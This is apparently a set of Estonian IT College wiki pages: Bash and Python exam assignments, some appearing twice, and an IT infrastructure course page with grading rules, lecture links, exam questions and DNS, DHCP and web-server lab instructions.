Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-05-19T07:36:33Z

Mernits: /* BASH kontrolltöö 12. mai 2015.a. */

==Python/BASH kontrolltöö 19. mai 2015.a.==

Loo skript, mis saab käsurealt kolm parameetrit. 1. string 2. sisendfail 3. väljundfail

* Skript kontrollib, kas sisendfaili saab lugemiseks avada
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kolm (vastasel juhul exit 3)

Skript kirjutab väljundfaili kõik read sisendfailist, mis sisaldavad esimese argumendina antud sõna.

==BASH kontrolltöö 12. mai 2015.a.==

Loo skript, mis saab käsurealt kolm parameetrit. 1. kasutajanimi 2. Väljundfail 3. kataloog

* Skript kontrollib, et kasutajanimi on olemas. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kolm (vastasel juhul exit 3)

Skript kirjutab väljundfaili kõikide failide nimekirja, kuhu esimese parameetrina antud kasutaja saab kirjutada ja mis asuvad kolmanda parameetrina antud kataloogis või selle alamkataloogides.

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kaks (vastasel juhul exit 3)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
/sedapoleolemas
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Kui faili/kataloogi ei ole, siis kirjutab (not found). Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
/sedapoleolemas,not found
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

Category:I375/I803/I853 IT Infrastructure services

2015-05-18T08:18:21Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

